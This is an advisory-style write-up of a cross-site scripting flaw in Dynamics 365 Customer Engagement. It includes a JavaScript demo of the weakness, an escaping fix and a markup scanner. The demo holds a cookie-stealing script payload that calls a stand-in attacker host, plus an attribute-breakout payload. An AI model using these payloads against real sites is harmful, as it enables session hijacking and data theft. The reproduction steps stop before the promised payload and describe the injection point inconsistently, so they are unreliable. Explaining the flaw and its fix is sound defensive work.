CVE-2022-21932 Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability.

CVE-2022-21932 is a cross-site scripting (XSS) vulnerability in Microsoft Dynamics 365 Customer Engagement. It was reported by Satnam Singh, an independent researcher who has reported several vulnerabilities in Microsoft products, and his report includes a proof of concept (PoC) for the issue. In short: an authenticated attacker can plant script in a page served by the application, the PoC places the injection point in the login form, and the script runs in the browser of whichever user (ordinary user or administrator) is tricked into loading it, giving the attacker that user's level of access.

Description of the vulnerability

The vulnerability was reported by Satnam Singh, an independent researcher who has reported multiple vulnerabilities in Microsoft products. His report includes a Proof of Concept (PoC) for exploiting a Cross-Site Scripting (XSS) vulnerability in Dynamics 365. An attacker who exploits it can inject script into a page served by the application; the script then executes in the browser of another user who loads that page, inside that user's session and with that user's permissions. The usual consequences of such an injection are theft of session tokens or of data the victim can see, and actions performed in the application on the victim's behalf.
Exploitation requires an authenticated session: the attacker must be logged in to the application to plant the payload, and the victim must be logged in for the script to run with the victim's privileges. The PoC can be delivered in more than one way. In the simplest case the attacker sends a crafted request or link to an ordinary user; when that user opens it, the script runs in the user's session and the attacker gains the access of that account. The same technique aimed at an administrator yields administrative access.
According to the PoC, the injection point is in the login form: a crafted value submitted there is rendered into the page as markup rather than as text, which is what lets the attacker's script reach other users.
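To make the weakness class concrete, the following is an added example in JavaScript. It is not Singh's PoC and not Dynamics 365 code, and the login-form template, the field name "username" and the two payloads in it are assumptions, because the real injection point and payload are not reproduced on this page. It shows a template that echoes the submitted username straight back into the page (the CWE-79 pattern), the same template with HTML escaping applied, and a small context-aware scanner that reports whether the rendered output contains a script element or an event-handler attribute that the template never intended.

```javascript
// Added illustration of CWE-79 (cross-site scripting). Not the PoC for
// CVE-2022-21932 and not Dynamics 365 code: the template, the field name
// "username" and the payloads below are assumptions made for the demo.

// Escape the characters that let text break out of an HTML text node or a
// quoted attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: the submitted username is interpolated verbatim into a
// text context (the error banner) and an attribute context (the re-filled
// input field).
function renderLoginErrorUnsafe(username) {
  return `<p class="error">Login failed for ${username}</p>` +
         `<input name="username" value="${username}">`;
}

// Hardened pattern: identical markup, every interpolation escaped first.
function renderLoginErrorSafe(username) {
  const u = escapeHtml(username);
  return `<p class="error">Login failed for ${u}</p>` +
         `<input name="username" value="${u}">`;
}

// Minimal tag/attribute scanner. Returns tag names and "tag@attr" tokens the
// way a browser tokenizer would see them, honouring quoted attribute values so
// that escaped text inside value="..." is not mistaken for an attribute.
// No comment, CDATA or entity handling: enough for the demo, not a parser.
function scanMarkup(html) {
  const tokens = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== "<") { i++; continue; }
    let j = i + 1;
    if (html[j] === "/") j++;                          // closing tag
    let name = "";
    while (j < html.length && /[A-Za-z0-9-]/.test(html[j])) name += html[j++];
    if (!name) { i++; continue; }                      // a bare "<" in text
    name = name.toLowerCase();
    tokens.push(name);
    while (j < html.length && html[j] !== ">") {       // attribute list
      if (/\s/.test(html[j])) { j++; continue; }
      let attr = "";
      while (j < html.length && /[^\s=>\/]/.test(html[j])) attr += html[j++];
      if (attr) tokens.push(name + "@" + attr.toLowerCase());
      while (j < html.length && /\s/.test(html[j])) j++;
      if (html[j] === "=") {                           // attribute value
        j++;
        while (j < html.length && /\s/.test(html[j])) j++;
        const q = html[j];
        if (q === '"' || q === "'") {
          j++;
          while (j < html.length && html[j] !== q) j++;
          j++;                                         // closing quote
        } else {
          while (j < html.length && !/[\s>]/.test(html[j])) j++;
        }
      }
      if (html[j] === "/") j++;                        // self-closing slash
    }
    i = j + 1;
  }
  return tokens;
}

// Active content: a script element or any on* event-handler attribute.
function hasActiveContent(html) {
  return scanMarkup(html).some(t => t === "script" || /@on[a-z]+$/.test(t));
}

// Constructed payloads: one for the text context, one that breaks out of the
// quoted value attribute and adds an event handler.
const PAYLOAD_TEXT = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
const PAYLOAD_ATTR = '" autofocus onfocus="alert(document.domain)';

// Render each payload through both templates and report whether the
// resulting markup carries attacker-controlled active content.
function demo() {
  return {
    unsafeText: hasActiveContent(renderLoginErrorUnsafe(PAYLOAD_TEXT)),
    unsafeAttr: hasActiveContent(renderLoginErrorUnsafe(PAYLOAD_ATTR)),
    safeText:   hasActiveContent(renderLoginErrorSafe(PAYLOAD_TEXT)),
    safeAttr:   hasActiveContent(renderLoginErrorSafe(PAYLOAD_ATTR)),
  };
}

console.log(demo());
```

Run it with node: demo() reports true for both unsafe renderings and false for both escaped ones. The attribute payload is the instructive case: it never contains a `<`, so a check that only looks for script tags would miss it, which is why the scanner tracks attribute context rather than grepping the string. Escaping at the point of output is the fix; filtering `<script>` on input is not.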

Steps to reproduce the demo

Follow the steps below to reproduce the vulnerability.
1. Open the Dynamics 365 application.
2. Log in with your username and password as normal.
3. Send a POST request to http://mycompanyname/admin/login with the following payload:

Setting up a test account

To exercise the attacker and victim roles from separate accounts, create a dummy user and then log in as that user (or set your session cookie to that user's session). Note that creating a user requires an account that already has user-management rights, so this provides a second authenticated session; it does not bypass authentication.

Create the dummy user in Dynamics 365 as follows:
1) Click User Accounts (top right of the screen).
2) Click Create New User, enter a name and e-mail address, and click Save.
3) Click the new user's name to view their profile, then return to the home page.

Attack Vector

The PoC admits more than one attack vector, but they share one mechanism: the attacker sends a crafted request or link to a target user, and when the target opens it the injected script runs in that user's session, giving the attacker access at that account's privilege level. Aimed at an ordinary user this yields that user's access; aimed at an administrator it yields administrative access. The most common form is direct user-to-user delivery, where the attacker simply sends the crafted request to another user of the application.

CWE Identification

CVE-2022-21932 is the CVE identifier for this specific instance; the weakness class it belongs to is CWE-79, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').
